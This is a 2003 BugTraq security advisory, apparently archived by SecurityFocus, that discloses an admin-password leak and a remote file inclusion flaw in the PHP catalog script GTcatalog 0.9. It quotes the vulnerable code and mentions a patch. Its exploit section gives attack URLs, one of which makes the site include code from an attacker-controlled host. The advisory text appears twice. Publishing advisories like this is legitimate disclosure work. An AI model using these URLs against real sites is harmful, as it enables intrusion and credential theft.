BugTraq
Back to list
|
Post reply
GTcatalog (PHP)
Mar 03 2003 02:52PM
Frog Man (leseulfrog hotmail com)
Informations :
°°°°°°°°°°°°°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
password.inc :
<?
$globalpw = "[PASSWORD]";
?>
index.php :
------------------------------------------------------------------------
[...]
switch ($function)
{
case "custom":
$cc = new Template();
$cc->set_file("head",$dir_base.$dir_template."header.inc");
$cc->set_var(array( 'clientcode' => $cfg_clientcode,
'title' => $cfg_title." - ".$custom));
$cc->parse("output","head");
$cc->p("output");
include($custom.".custom.inc");
include ($dir_base.$dir_template."footer.inc");
break;
[...]
------------------------------------------------------------------------
Exploits :
°°°°°°°°°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Informations :
°°°°°°°°°°°°°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
password.inc :
<?
$globalpw = "[PASSWORD]";
?>
index.php :
------------------------------------------------------------------------
[...]
switch ($function)
{
case "custom":
$cc = new Template();
$cc->set_file("head",$dir_base.$dir_template."header.inc");
$cc->set_var(array( 'clientcode' => $cfg_clientcode,
'title' => $cfg_title." - ".$custom));
$cc->parse("output","head");
$cc->p("output");
include($custom.".custom.inc");
include ($dir_base.$dir_template."footer.inc");
break;
[...]
------------------------------------------------------------------------
Exploits :
°°°°°°°°°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
[ reply ]